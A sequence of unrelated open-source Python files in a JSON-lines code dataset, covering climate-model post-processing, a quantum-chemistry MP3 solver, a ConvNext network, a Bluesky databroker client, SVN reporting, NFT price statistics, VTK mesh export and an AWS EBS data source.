'proleptic_gregorian')\n if not 25 <= (newdate-lastdate).days <= 35:\n print(\"Date mismatch\", lastdate, newdate, newdate-lastdate, file=sys.stderr)\n raise Exception('Date mismatch')\n\n result = process(d)\n\n for t in range(len(time_in)):\n\n aabwf[offset+t] = result[0][t]*1e-9\n sodc[offset+t] = result[1][t]*1e-9\n nadwf[offset+t] = result[2][t]*1e-9\n amoc26n[offset+t] = result[3][t]*1e-9\n\n # Handle possible changes in the base date\n # Ocean model files incorrectly have calendar attribute\n # set as gregorian, but really use proleptic_gregorian\n date = netCDF4.num2date(time_in[t], time_in.units, 'proleptic_gregorian')\n print(\"DATE\", date)\n time[offset+t] = netCDF4.date2num(date, time.units, time.calendar)\n mon = date.month - 1 # Convert to an index\n date = netCDF4.num2date(time_bounds_in[t], time_in.units, 'proleptic_gregorian')\n time_bounds[offset+t] = netCDF4.date2num(date, time.units, time.calendar)\n # Update the annual means\n annt = (offset+t)//12\n for vname in dout.variables:\n v = dout.variables[vname]\n if 'time' in v.dimensions:\n if vname.startswith('time'):\n annvar = dout.variables[vname.replace('time','year')]\n else:\n annvar = dout.variables['%s_ann' % vname]\n if vname == f'time_{bounds_name}':\n if mon==0:\n annvar[annt] = v[offset+t]\n elif mon==11:\n # End bounds\n annvar[annt,1] = v[offset+t,1]\n else:\n if mon==0:\n annvar[annt] = mwts[mon]*v[offset+t]\n else:\n annvar[annt] += mwts[mon]*v[offset+t]\n d.close()\n\n dout.sync() # Sync to disk once per year\n\ndout.close()\n","repo_name":"MartinDix/access_monitoring","sub_path":"ocean_MOC_update.py","file_name":"ocean_MOC_update.py","file_ext":"py","file_size_in_byte":10647,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"1755330730","text":"from moha.system.hamiltonian.chemical_hamiltonian import *\nfrom moha.system.operator.base import OperatorNames\nfrom moha.posthf.pt.auxiliary import *\nfrom moha.io.log import log, timer\n\nimport numpy as np\nimport copy\n\n__all__ = ['MP3Solver']\n\nclass MP3Solver(object):\n \"\"\"Third-order Moller-Plesset perturbation solver.\n\n Attributes\n ----------\n ham\n Chemical Hamiltonian.\n\n wfn\n Hartree Fock wavefunction.\n\n hf_results : dict\n Hartree Fock calculation results.\n\n Methods\n -------\n __init__(self,ham,wfn,hf_results)\n Initialize the solver.\n\n kernel(self)\n Kernel of the solver.\n\n assign_hamiltonian(self,ham)\n Assign the chemical Hamiltonian to the solver.\n\n assign_wavefunction(self,wfn)\n Assign the Hartree Fock wavefunction to the solver.\n\n assign_hartree_fock_results(self,hf_results)\n Assign the Hartree Fock calculation results to the solver.\n \"\"\"\n def __init__(self,ham,wfn,hf_results):\n \"\"\"Initialize the solver.\n\n Attributes\n ----------\n ham\n Chemical Hamiltonian.\n\n wfn\n Hartree Fock wavefunction.\n\n hf_results : dict\n Hartree Fock calculation results.\n \"\"\"\n self.assign_hamiltonian(ham)\n self.assign_wavefunction(wfn)\n self.assign_hartree_fock_results(hf_results)\n\n @timer.with_section(\"MP3\")\n def kernel(self):\n \"\"\"Kernel of the solver.\n\n Returns\n -------\n results : dict\n MP3 calculation results.\n \"\"\" \n log.hline()\n log('MP3 Calculation Section'.format())\n log.hline()\n \n ham = copy.deepcopy(self.ham)\n wfn = copy.deepcopy(self.wfn)\n hf_results = self.hf_results\n \n nspatial = ham.nspatial \n occ = wfn.occ\n C = wfn.coefficients\n eorbitals = wfn.orbital_energies\n \n Emp2 = 0.0\n Eri = ham.operators[OperatorNames.Eri]\n Eri.basis_transformation(C)\n for i in range(occ['alpha']):\n for j in range(occ['alpha']):\n for a in range(occ['alpha'],nspatial):\n for b in range(occ['alpha'],nspatial):\n Emp2 += Eri[i,a,j,b]*(2*Eri[i,a,j,b]-Eri[i,b,j,a])\\\n /(eorbitals[i] + eorbitals[j] -eorbitals[a] - eorbitals[b])\n\n Emp3 = 0.0\n Eri = ham.operators[OperatorNames.Eri].double_bar\n for i in range(occ['alpha']):\n for j in range(occ['alpha']):\n for k in range(occ['alpha']):\n for l in range(occ['alpha']):\n for a in range(occ['alpha'],nspatial):\n for b in range(occ['alpha'],nspatial):\n Emp3 += (1/8.0)*Eri[i,j,a,b]*Eri[k,l,i,j]*Eri[a,b,k,l]\\\n /((eorbitals[i] + eorbitals[j] -eorbitals[a] - eorbitals[b])\\\n *(eorbitals[k] + eorbitals[l] -eorbitals[a] - eorbitals[b]))\n for i in range(occ['alpha']):\n for j in range(occ['alpha']):\n for a in range(occ['alpha'],nspatial):\n for b in range(occ['alpha'],nspatial):\n for c in range(occ['alpha'],nspatial):\n for d in range(occ['alpha'],nspatial):\n Emp3 += (1/8.0)*Eri[i,j,a,b]*Eri[a,b,c,d]*Eri[c,d,i,j]\\\n /((eorbitals[i] + eorbitals[j] -eorbitals[a] - eorbitals[b])\\\n *(eorbitals[i] + eorbitals[j] -eorbitals[c] - eorbitals[d]))\n for i in range(occ['alpha']):\n for j in range(occ['alpha']):\n for k in range(occ['alpha']):\n for a in range(occ['alpha'],nspatial):\n for b in range(occ['alpha'],nspatial):\n for c in range(occ['alpha'],nspatial):\n Emp3 += Eri[i,j,a,b]*Eri[k,b,c,j]*Eri[a,c,i,k]\\\n /((eorbitals[i] + eorbitals[j] -eorbitals[a] - eorbitals[b])\\\n *(eorbitals[i] + eorbitals[k] -eorbitals[c] - eorbitals[c]))\n \n log.hline()\n log('MP3 Results'.format())\n log.hline()\n log('{0:2s} {1:3f}'.format('Escf', hf_results['total_energy']))\n log('{0:2s} {1:3f}'.format('Emp2', Emp2))\n log('{0:2s} {1:3f}'.format('Emp3', Emp3))\n log('{0:2s} {1:3f}'.format('Etot', hf_results['total_energy']+Emp2+Emp3))\n log.hline()\n\n results = {\n \"success\": True,\n \"mp2_energy\":Emp2,\n \"mp3_energy\":Emp3,\n \"total_energy\":hf_results['total_energy']+Emp2+Emp3\n }\n\n return results\n\n def assign_hamiltonian(self,ham):\n \"\"\"Assign the chemical Hamiltonian to the solver.\n\n Attributes\n ----------\n ham\n Chemical Hamiltonian.\n \"\"\"\n self.ham = ham\n\n def assign_wavefunction(self,wfn):\n \"\"\"Assign the Hartree Fock wavefunction to the solver.\n\n Attributes\n ----------\n wfn\n Hartree Fock wavefunction.\n \"\"\"\n self.wfn = wfn\n\n def assign_hartree_fock_results(self,hf_results):\n \"\"\"Assign the Hartree Fock calculation results to the solver.\n\n Attributes\n ----------\n hf_results : dict\n Hartree Fock calculation results.\n\n Raises\n ------\n TypeError\n If Hartree Fock calculation results is not a dictionary.\n \"\"\"\n if not isinstance(hf_results, dict):\n raise TypeError(\"Hartree Fock calculation results must be a dictionary\")\n self.hf_results = hf_results\n","repo_name":"ZhaoYilin/moha","sub_path":"moha/posthf/pt/mp3.py","file_name":"mp3.py","file_ext":"py","file_size_in_byte":5755,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"37"} +{"seq_id":"9785682888","text":"import torch.nn as nn\nimport math\n\n\nclass InvertedResidualBlock(nn.Module):\n\n def __init__(self, in_channels, out_channels, expand_ratio, first_stage=False, first_block=False):\n super().__init__()\n \n hidden_dim = out_channels * expand_ratio\n \n self.transform_conv = None\n if(not first_stage and first_block):\n self.transform_conv = nn.Conv1d(in_channels, out_channels, kernel_size=1, stride=2)\n\n self.spatial_mixing = nn.Sequential(\n nn.Conv1d(out_channels, out_channels, kernel_size=7, padding=3, groups=in_channels, bias=False),\n nn.BatchNorm1d(out_channels),\n )\n\n self.feature_mixing = nn.Sequential(\n nn.Conv1d(out_channels, hidden_dim, kernel_size=1, stride=1),\n nn.GELU(),\n )\n\n self.bottleneck_channels = nn.Sequential(\n nn.Conv1d(hidden_dim, out_channels, kernel_size=1, stride=1),\n )\n\n def forward(self, x):\n if(self.transform_conv):\n x = self.transform_conv(x)\n\n out = self.spatial_mixing(x)\n out = self.feature_mixing(out)\n out = self.bottleneck_channels(out)\n\n return x + out\n\nclass ConvNext(nn.Module):\n \n def __init__(self):\n super().__init__()\n\n \n self.stem = nn.Sequential(\n nn.Conv1d(256, 96, kernel_size=4, stride=4, bias=False),\n nn.BatchNorm1d(96),\n nn.GELU(),\n )\n\n self.stage_cfgs = [\n [4, 96, 3]\n ]\n\n in_channels = 96\n\n layers = []\n for idx, curr_stage in enumerate(self.stage_cfgs):\n expand_ratio, out_channels, num_blocks = curr_stage\n for block_idx in range(num_blocks):\n \n block = InvertedResidualBlock(\n in_channels=in_channels,\n out_channels=out_channels,\n expand_ratio=expand_ratio,\n first_stage=True if idx == 0 else False,\n first_block=True if block_idx == 0 else False\n )\n layers.append(block)\n \n in_channels = out_channels \n \n self.layers = nn.Sequential(*layers)\n\n self.final_block = nn.Sequential(\n nn.Conv1d(in_channels, 256, kernel_size=1, padding=0, stride=1, bias=False),\n nn.BatchNorm1d(256),\n nn.GELU()\n )\n\n \n\n self._initialize_weights()\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv1d):\n n = m.kernel_size[0] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm1d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n\n def forward(self, x):\n out = self.stem(x)\n out = self.layers(out)\n feats = self.final_block(out)\n\n return feats","repo_name":"yonas-g/stt_low_resource","sub_path":"utils/ConvNext.py","file_name":"ConvNext.py","file_ext":"py","file_size_in_byte":3176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6747868510","text":"import collections.abc\nimport json\nimport keyword\nimport warnings\n\nfrom tiled.adapters.utils import IndexCallable\nfrom tiled.client.container import DEFAULT_STRUCTURE_CLIENT_DISPATCH, Container\nfrom tiled.client.utils import handle_error\nfrom tiled.utils import safe_json_dump\n\nfrom .common import BlueskyEventStreamMixin, BlueskyRunMixin, CatalogOfBlueskyRunsMixin\nfrom .queries import PartialUID, RawMongo, ScanID\nfrom .document import Start, Stop, Descriptor, EventPage, DatumPage, Resource\n\n\n_document_types = {\n \"start\": Start,\n \"stop\": Stop,\n \"descriptor\": Descriptor,\n \"event_page\": EventPage,\n \"datum_page\": DatumPage,\n \"resource\": Resource,\n}\n# There are methods that IPython will try to call.\n# We special-case them because we want to avoid the getattr\n# resulting in an unnecessary network hit just to raise\n# AttributeError.\n_IPYTHON_METHODS = {\"_ipython_canary_method_should_not_exist_\", \"_repr_mimebundle_\"}\n\n\nclass BlueskyRun(BlueskyRunMixin, Container):\n \"\"\"\n This encapsulates the data and metadata for one Bluesky 'run'.\n\n This adds for bluesky-specific conveniences to the standard client Container.\n \"\"\"\n\n @property\n def start(self):\n \"\"\"\n The Run Start document. A convenience alias:\n\n >>> run.start is run.metadata[\"start\"]\n True\n \"\"\"\n return self.metadata[\"start\"]\n\n @property\n def stop(self):\n \"\"\"\n The Run Stop document. A convenience alias:\n\n >>> run.stop is run.metadata[\"stop\"]\n True\n \"\"\"\n return self.metadata[\"stop\"]\n\n @property\n def v2(self):\n return self\n\n def documents(self, fill=False):\n # For back-compat with v2:\n if fill == \"yes\":\n fill = True\n elif fill == \"no\":\n fill = False\n elif fill == \"delayed\":\n raise NotImplementedError(\"fill='delayed' is not supported\")\n else:\n fill = bool(fill)\n link = self.item[\"links\"][\"self\"].replace(\n \"/metadata\", \"/documents\", 1\n )\n request = self.context.http_client.build_request(\n \"GET\",\n link,\n params={\"fill\": fill},\n headers={\"Accept\": \"application/json-seq\"},\n )\n response = self.context.http_client.send(request, stream=True)\n try:\n if response.is_error:\n response.read()\n handle_error(response)\n for chunk in response.iter_bytes():\n for line in chunk.decode().splitlines():\n item = json.loads(line)\n yield (item[\"name\"], _document_types[item[\"name\"]](item[\"doc\"]))\n finally:\n response.close()\n\n def __getattr__(self, key):\n \"\"\"\n Let run.X be a synonym for run['X'] unless run.X already exists.\n\n This behavior is the same as with pandas.DataFrame.\n \"\"\"\n # The wisdom of this kind of \"magic\" is arguable, but we\n # need to support it for backward-compatibility reasons.\n if key in _IPYTHON_METHODS:\n raise AttributeError(key)\n if key in self:\n return self[key]\n raise AttributeError(key)\n\n def __dir__(self):\n # Build a list of entries that are valid attribute names\n # and add them to __dir__ so that they tab-complete.\n tab_completable_entries = [\n entry\n for entry in self\n if (entry.isidentifier() and (not keyword.iskeyword(entry)))\n ]\n return super().__dir__() + tab_completable_entries\n\n def describe(self):\n \"For back-compat with intake-based BlueskyRun\"\n warnings.warn(\n \"This will be removed. Use .metadata directly instead of describe()['metadata'].\",\n DeprecationWarning,\n )\n return {\"metadata\": self.metadata}\n\n def __call__(self):\n warnings.warn(\n \"Do not call a BlueskyRun. For now this returns self, for \"\n \"backward-compatibility. but it will be removed in a future \"\n \"release.\",\n DeprecationWarning,\n stacklevel=2,\n )\n return self\n\n def read(self):\n raise NotImplementedError(\n \"Reading any entire run is not supported. \"\n \"Access a stream in this run and read that.\"\n )\n\n to_dask = read\n\n\nclass BlueskyEventStream(BlueskyEventStreamMixin, Container):\n \"\"\"\n This encapsulates the data and metadata for one 'stream' in a Bluesky 'run'.\n\n This adds for bluesky-specific conveniences to the standard client Container.\n \"\"\"\n\n @property\n def descriptors(self):\n return self.metadata[\"descriptors\"]\n\n @property\n def _descriptors(self):\n # For backward-compatibility.\n # We do not normally worry about backward-compatibility of _ methods, but\n # for a time databroker.v2 *only* have _descriptors and not descriptros,\n # and I know there is useer code that relies on that.\n warnings.warn(\"Use .descriptors instead of ._descriptors.\", stacklevel=2)\n return self.descriptors\n\n def __getattr__(self, key):\n \"\"\"\n Let run.X be a synonym for run['X'] unless run.X already exists.\n\n This behavior is the same as with pandas.DataFrame.\n \"\"\"\n # The wisdom of this kind of \"magic\" is arguable, but we\n # need to support it for backward-compatibility reasons.\n if key in _IPYTHON_METHODS:\n raise AttributeError(key)\n if key in self:\n return self[key]\n raise AttributeError(key)\n\n def __dir__(self):\n # Build a list of entries that are valid attribute names\n # and add them to __dir__ so that they tab-complete.\n tab_completable_entries = [\n entry\n for entry in self\n if (entry.isidentifier() and (not keyword.iskeyword(entry)))\n ]\n return super().__dir__() + tab_completable_entries\n\n def read(self, *args, **kwargs):\n \"\"\"\n Shortcut for reading the 'data' (as opposed to timestamps or config).\n\n That is:\n\n >>> stream.read(...)\n\n is equivalent to\n\n >>> stream[\"data\"].read(...)\n \"\"\"\n return self[\"data\"].read(*args, **kwargs)\n\n def to_dask(self):\n warnings.warn(\n \"\"\"Do not use this method.\nInstead, set dask or when first creating the client, as in\n\n >>> catalog = from_uri(\"...\", \"dask\")\n\nand then read() will return dask objects.\"\"\",\n DeprecationWarning,\n stacklevel=2,\n )\n return self.new_variation(\n structure_clients=DEFAULT_STRUCTURE_CLIENT_DISPATCH[\"dask\"]\n ).read()\n\n\nclass CatalogOfBlueskyRuns(CatalogOfBlueskyRunsMixin, Container):\n \"\"\"\n This adds some bluesky-specific conveniences to the standard client Container.\n\n >>> catalog.scan_id[1234] # scan_id lookup\n >>> catalog.uid[\"9acjef\"] # (partial) uid lookup\n >>> catalog[1234] # automatically do scan_id lookup for positive integer\n >>> catalog[\"9acjef\"] # automatically do (partial) uid lookup for string\n >>> catalog[-5] # automatically do catalog.values()[-N] for negative integer\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.scan_id = IndexCallable(self._lookup_by_scan_id)\n self.uid = IndexCallable(self._lookup_by_partial_uid)\n self._v1 = None\n\n @property\n def v2(self):\n return self\n\n def __getitem__(self, key):\n # For convenience and backward-compatiblity reasons, we support\n # some \"magic\" here that is helpful in an interactive setting.\n if isinstance(key, str):\n # CASE 1: Interpret key as a uid or partial uid.\n if len(key) == 36:\n # This looks like a full uid. Try direct lookup first.\n try:\n return super().__getitem__(key)\n except KeyError:\n # Fall back to partial uid lookup below.\n pass\n return self._lookup_by_partial_uid(key)\n elif isinstance(key, int):\n if key > 0:\n # CASE 2: Interpret key as a scan_id.\n return self._lookup_by_scan_id(key)\n else:\n # CASE 3: Interpret key as a recently lookup, as in\n # `catalog[-1]` is the latest entry.\n return self.values()[key]\n elif isinstance(key, slice):\n if (key.start is None) or (key.start >= 0):\n raise ValueError(\n \"For backward-compatibility reasons, slicing here \"\n \"is limited to negative indexes. \"\n \"Use .values() to slice how you please.\"\n )\n return self.values()[key]\n elif isinstance(key, collections.abc.Iterable):\n # We know that isn't a str because we check that above.\n # Recurse.\n return [self[item] for item in key]\n else:\n raise ValueError(\n \"Indexing expects a string, an integer, or a collection of strings and/or integers.\"\n )\n\n def _lookup_by_scan_id(self, scan_id):\n results = self.search(ScanID(scan_id, duplicates=\"latest\"))\n if not results:\n raise KeyError(f\"No match for scan_id={scan_id}\")\n else:\n # By construction there must be only one result. Return it.\n return results.values().first()\n\n def _lookup_by_partial_uid(self, partial_uid):\n results = self.search(PartialUID(partial_uid))\n if not results:\n raise KeyError(f\"No match for partial_uid {partial_uid}\")\n else:\n # By construction there must be only one result. Return it.\n return results.values().first()\n\n def get_serializer(self):\n from tiled.server.app import get_root_tree\n\n if not hasattr(self.context.http_client, \"app\"):\n raise NotImplementedError(\"Only works on local application.\")\n tree = self.context.http_client.app.dependency_overrides[get_root_tree]()\n return tree.get_serializer()\n\n def search(self, query):\n # For backward-compatiblity, accept a dict and interpret it as a Mongo\n # query against the 'start' documents.\n if isinstance(query, dict):\n query = RawMongo(start=query)\n return super().search(query)\n\n @property\n def v1(self):\n \"Accessor to legacy interface.\"\n if self._v1 is None:\n from .v1 import Broker\n\n self._v1 = Broker(self)\n return self._v1\n\n def post_document(self, name, doc):\n link = self.item[\"links\"][\"self\"].replace(\n \"/metadata\", \"/documents\", 1\n )\n response = self.context.http_client.post(\n link,\n content=safe_json_dump({\"name\": name, \"doc\": doc})\n )\n handle_error(response)\n","repo_name":"bluesky/databroker","sub_path":"databroker/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":10956,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"37"} +{"seq_id":"18926098442","text":"# This routine is used to create SVN report of different paths in svn.cfg file.\n# Author: Rupinder Singh\n# Last Reviewed: August 4, 2017\n\nimport imp\nimport os\nimport time\n#IMPORTANT: svn.cfg should be in same path as this script (svn_enforcer.py)\ncfg_pth = os.path.dirname(os.path.abspath(__file__)) \n#IMPORTANT: pLib directory should exist in same path as svn_enforcer direcotry \npth_lib = os.path.dirname(cfg_pth)+'/pLib/' \nrsvn = imp.load_source('rs_svn',pth_lib+'rs_svn.py')\nrss = imp.load_source('rs_scraper',pth_lib+'rs_scraper.py')\nrsql = imp.load_source('rs_mysql',pth_lib+'rs_mysql.py')\n\nif __name__ == '__main__':\n\n #Make sure svn.cfg exists (see README for details)\n cfg_fn = \"/svn.cfg\" \n cfg = rsql.load_config_file(cfg_pth+cfg_fn)\n pth_key = 'path' #key used in cfg for path\n email_key = 'email' #key use in cfg for emails\n \n #EMAIL Details\n HOSTNAME = rss.get_hostname()\n eFrom = \"svn_enforcer@\"+HOSTNAME\n\n try:\n for key in cfg:\n #\n svn_pth = cfg[key][pth_key]\n eTo = cfg[key][email_key]\n \n #CREATE HTML FOR EMAIL:\n eHTML = \"\" \n eHTML += \"\"\n\n eSubject = \"SVN ENFORCER: \"+key+'@'+HOSTNAME\n\n eHTML += \"

1) SVN INFO (\"+time.strftime(\"%c\")+\")

\"\n out,err = rsvn.svn_info(svn_pth)\n eHTML += out.replace('\\n', '
')+'
'+err\n\n eHTML += \"

2) SVN CLEANUP (\"+time.strftime(\"%c\")+\")

\"\n out,err = rsvn.svn_cleanup(svn_pth)\n eHTML += out.replace('\\n', '
')+'
'+err\n\n eHTML += \"

3) SVN UPDATE (\"+time.strftime(\"%c\")+\")

\"\n out,err = rsvn.svn_update(svn_pth)\n eHTML += out.replace('\\n', '
')+'
'+err\n\n eHTML += \"

4) SVN RESOLVE (\"+time.strftime(\"%c\")+\")

\"\n out,err = rsvn.svn_resolve(svn_pth) #adding as fail-safe if update doesn't accept conflict via thiers-full option\n eHTML += out.replace('\\n', '
')+'
'+err\n\n eHTML += \"

5) SVN STATUS (\"+time.strftime(\"%c\")+\")

\"\n out,err = rsvn.svn_status(svn_pth)\n eHTML += out.replace('\\n', '
')+'
'+err\n\n eHTML += \"

6) SVN DIFF (\"+time.strftime(\"%c\")+\")

\"\n out,err = rsvn.svn_diff(svn_pth)\n eHTML += \"Please see attachment (svn_diff.log)\"\n eFiles = [svn_pth.replace('\\ ',' ').replace(\" \",\"\\ \")+'/svn_diff.log']\n with open(eFiles[0], 'wb') as f:\n f.write(out)\n\n eHTML += \"

7) SVN RECENT COMMIT PER FILE (\"+time.strftime(\"%c\")+\")

\"\n df = rsvn.svn_commit_per_file(svn_pth)\n eHTML += df.to_html(justify='left')\n\n eHTML += \"

8) SVN LOG STATS (\"+time.strftime(\"%c\")+\")

\"\n df = rsvn.svn_log_stats(svn_pth)\n eHTML += df.to_html(justify='left')\n\n eHTML += \"

Finished! (\"+time.strftime(\"%c\")+\")

\"\n eHTML += \"\" \n \n #SEND EMAIL\n rss.send_email(eFrom, eTo, eSubject, eHTML, FILES = eFiles)\n except:\n if 'eHTML' not in locals():\n #CREATE HTML FOR EMAIL:\n eHTML = \"\" \n eHTML += \"\"\n eTo = 'YOUR_EMAIL_HERE@HOST.COM' #enter default email for errors\n eSubject = \"SVN ENFORCER: \"+HOSTNAME+\" (FAILED!)\"\n eHTML += \"

Process Failed! (\"+time.strftime(\"%c\")+\")

\"\n eHTML += \"\" \n \n #SEND EMAIL\n rss.send_email(eFrom,eTo,eSubject,eHTML)\n","repo_name":"rupndrsingh/svn-enforcer","sub_path":"svn_enforcer/svn_enforcer.py","file_name":"svn_enforcer.py","file_ext":"py","file_size_in_byte":3620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70696165228","text":"import sys, mysql.connector\nfrom tabulate import tabulate\n\nif __name__ == '__main__':\n if len(sys.argv) < 3 :\n print(\"Please give the name of NFT collections you want to trace and date range\")\n exit()\n mydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n database=\"dApp\"\n )\n collection = sys.argv[1]\n date_type = sys.argv[2]\n cursor = mydb.cursor()\n cursor.execute(\"SELECT DATE_FORMAT(date_trunc('{}', load_time), '%Y-%m-%d') AS {}, AVG(floor_price) AS average_price, STDDEV(floor_price) AS standard_deviation FROM {} GROUP BY DATE_FORMAT(date_trunc('{}', load_time), '%Y-%m-%d') LIMIT 2;\".format(date_type, date_type, collection, date_type))\n\n results = cursor.fetchall()\n\n print(tabulate(results, headers=[date_type, 'average_price', 'standard_deviation'], tablefmt='psql'))\n","repo_name":"yueyue1009/NFT_floor_price_stats","sub_path":"get_result.py","file_name":"get_result.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14020536437","text":"#!/usr/bin/env python\n\nimport sys\nimport out2\nimport numpy as np\n\nN = 15 # number of macroscopic variables\n_, keifile, mfile, vtkfile = sys.argv\n\ndef gmshTypeToVTKType(gmshtype):\n VTKTypes = [-1, -1, -1, -1, 10, 12, 13]\n return VTKTypes[gmshtype]\n\ndef listToStr(elm):\n return str(len(elm)) + ' ' + ' '.join( map(str, elm) )\n\ndef list3ToStr(l):\n return ' '.join( map(str, l) )\n\ndef toVec(data, pos):\n return map(list, zip(*data[pos : pos + 3]))\n\ndef writeScalar(name, data, pos):\n for i, scalars in enumerate(data[pos::N]):\n fd.writelines(\"SCALARS \" + name + \"%d float\\n\" % i)\n fd.writelines(\"LOOKUP_TABLE default\\n\")\n for scalar in scalars:\n fd.writelines(str(scalar) + '\\n')\n\ndef writeVector(name, data, pos):\n for i, vectors_x in enumerate(data[pos::N]):\n vectors = toVec(data, pos+i*N)\n fd.writelines(\"VECTORS \" + name + \"%d float\\n\" % i)\n for vector in vectors:\n fd.writelines(list3ToStr(vector) + '\\n')\n\nnodes, cells = out2.readNodesCells(keifile)\ndata = out2.readMacros(mfile, len(cells))\n\ncenternodes = []\nfor cell in cells:\n centernode = np.zeros(3)\n for vertex in cell.nodes:\n centernode += nodes[vertex]\n centernodes.append(centernode / len(cell.nodes))\n\nwith open(vtkfile, \"w\") as fd:\n fd.writelines(\"# vtk DataFile Version 2.0\\n\")\n fd.writelines(\"Velocity, MassFlux, HeatFlux, EnergyFlux.\\n\") \n fd.writelines(\"ASCII\\n\")\n fd.writelines(\"DATASET UNSTRUCTURED_GRID\\n\")\n\n fd.writelines(\"POINTS %d float\\n\" % (len(nodes)+len(centernodes)) )\n for node in nodes:\n fd.writelines(\"%f %f %f\\n\" % (node[0], node[1], node[2]) )\n\n for centernode in centernodes:\n fd.writelines(\"%f %f %f\\n\" % (centernode[0], centernode[1], centernode[2]) )\n\n fd.writelines(\"CELLS %d %d\\n\" % ( len(cells), sum( [len(cell.nodes)+1 for cell in cells] ) ))\n for cell in cells:\n fd.writelines(listToStr(cell.nodes) + '\\n')\n\n fd.writelines(\"CELL_TYPES %d\\n\" % len(cells))\n for cell in cells:\n fd.writelines(str(gmshTypeToVTKType(cell.type)) + '\\n')\n\n fd.writelines(\"CELL_DATA %d\\n\" % len(cells))\n\n writeScalar('Density', data, 0)\n writeVector('Velocity', data, 1)\n writeScalar('Temperature', data, 4)\n writeVector('Temperatures', data, 5)\n writeVector('HeatFlux', data, 8)\n writeVector('ShearStress', data, 11)\n writeScalar('H-function', data, 14)\n","repo_name":"olegrog/kesolver","sub_path":"tools/out2vtk.py","file_name":"out2vtk.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21486432308","text":"\"\"\"Problema 4 - RECURSIVA\"\"\"\n\"\"\"Encontrar o maior valor de uma lista\"\"\"\n\ntam = int(input(\"Digite o tamanho da lista: \"))\nlista = []\nfor i in range(tam):\n num = int(input(\"Digite um numero para a lista: \"))\n lista.append(num)\n\n\ndef maiorinteiro_aux(L, n):\n if n == 1:\n return L[0]\n else:\n m = maiorinteiro_aux(L, n - 1)\n if m > L[n - 1]:\n return m\n else:\n return L[n - 1]\n\n\ndef maiorinteiro(L):\n n = len(L)\n return maiorinteiro_aux(L, n)\n\n\nprint(\"O maior valor da lista L =\", lista, \"eh\", maiorinteiro(lista))\n","repo_name":"Gui-FernandesBR/MAC2166-2018","sub_path":"examples/6_recursive/problem4.py","file_name":"problem4.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5965982510","text":"import Funcs as f\r\nimport pandas as pd\r\n\r\n############# Controller ###############\r\nSITE = 1\r\n# LOCATIONCAPACITY = [7000, 6000] #scenario 1\r\nLOCATIONCAPACITY = [496836, 426576] #scenario 2\r\nHAVE_DATA = True\r\nSCENARIO = 2\r\n\r\nprint(\"we are running the program on site {} with scenario {}\".format(str(SITE), str(SCENARIO)))\r\n################## Date preparation #######################\r\nif not HAVE_DATA:\r\n f.data_preporation(site=SITE)\r\n\r\nweeks, populations = f.read_data(site = SITE)\r\n\r\n\r\n################## Initial optimization (step 1 & 2) ######################\r\ndf, forbidden_weeks, objective = f.optimizer(\r\n populations, weeks, site= SITE, location_capacity = LOCATIONCAPACITY[SITE], scenario = SCENARIO)\r\n\r\ndf.to_csv('saved/initial_results_for_site_{}_scenario_{}.csv'.format(str(SITE), str(SCENARIO)))\r\nprint('the optimized data frame has been saved')\r\n\r\n\r\n######################### Parameter tuning ###########################\r\nresults = f.tuning(populations, weeks, LOCATIONCAPACITY[SITE], forbidden_weeks, df, objective, scenario = SCENARIO)\r\n\r\nprint('the objectives and the final forbidden dictionary are ')\r\nfor i in results.keys():\r\n print(i,':',results[i])\r\n\r\n\r\n######################## final data results ############################\r\n\r\nforbidden_weeks = results[min(list(results.keys()))]\r\n\r\ndf, objective = f.final(populations, weeks, LOCATIONCAPACITY[SITE], forbidden_weeks, SITE, SCENARIO)\r\ndf.to_csv('saved/final_results_for_site_{}_scenario_{}.csv'.format(str(SITE), str(SCENARIO)))\r\n\r\nprint('the objective is : ', objective)","repo_name":"esysss/syngenta_challenge","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71419374826","text":"\"\"\"Data source for AWS Elastic Block Storage (EBS) volumes.\"\"\"\nfrom typing import Dict, List\n\nfrom sqlalchemy import Boolean, DateTime, Integer\nfrom sqlalchemy.dialects.postgresql import ENUM, JSONB\n\nfrom pantomath.provider.aws import (\n AwsDataSource,\n DataSourceColumn,\n beautify_tags,\n data_sources,\n)\n\n\n@data_sources.register(\"aws_ebs_volumes\")\nclass AwsEbsVolumesDataSource(AwsDataSource):\n \"\"\"Data source for AWS Elastic Block Storage (EBS) volumes.\"\"\"\n\n columns = [\n DataSourceColumn(\n description=\"Information about the volume attachments\",\n hydrate=\"Attachments\",\n name=\"attachments\",\n type=JSONB,\n ),\n DataSourceColumn(\n description=\"The Availability Zone for the volume\",\n hydrate=\"AvailabilityZone\",\n name=\"availability_zone\",\n ),\n DataSourceColumn(\n description=\"Indicates whether the volume is encrypted\",\n hydrate=\"CreateTime\",\n name=\"create_time\",\n type=DateTime(timezone=True),\n ),\n DataSourceColumn(\n description=\"Indicates whether the volume is encrypted\",\n hydrate=\"Encrypted\",\n name=\"encrypted\",\n type=Boolean,\n ),\n DataSourceColumn(\n description=\"The number of I/O operations per second 